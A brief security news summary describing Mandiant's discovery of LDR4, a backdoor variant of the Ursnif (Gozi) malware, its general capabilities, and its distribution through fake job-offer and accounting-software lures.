Since its emergence in the mid-2000s, Ursnif (aka. Gozi or Gozi/ISFB) malware has launched multiple banking trojan campaigns. Much recently, Ursnif has rolled out a new variant with generic backdoor capabilities.
Here are the details
Mandiant researchers first found this variant in June and named it LDR4. Its code has been cleaned and simplified and all banking features have been removed.
- The LDR4 backdoor’s features and modules focus on getting initial access to the compromised machine.
- The malware is capable of evading detection as it comes in DLL format and is packed by portable executable crypters, also signed with valid certificates.
- It collects system service data from the Windows registry and, upon execution, generates a user and a system ID to fetch and execute various commands on the host system.
- Successful initial compromise opens up the scope for other ransomware and data theft extortion operations.
Propagation
- Ursnif operators are distributing the LDR4 variant via fake job offer email lures. These email lures contain a link to a website that impersonates a legitimate company.
- The site visitors are requested to solve a CAPTCHA to download an Excel document that downloads and executes the payload from a remote resource.
- In addition, the operators are found using a lure pertaining to accounting software to deliver the payload.
Wrapping up
Previous Ursnif variants functioned as high-risk banking trojans and launched several sophisticated, successful campaigns. The latest LDR4 variant with a mix of code refactoring, regressions, and interesting simplification strategies points toward a new backdoor era for this malware. Furthermore, with the adoption of backdoor capabilities, it joins the likes of other malware families, such as Emotet, TrickBot, and Qakbot.
Publisher
/https://cyware-ent.s3.amazonaws.com/image_bank/7b9a_shutterstock_1764741107.jpg)
/https://cyware-ent.s3.amazonaws.com/image_bank/035f_shutterstock_778558222.jpg)
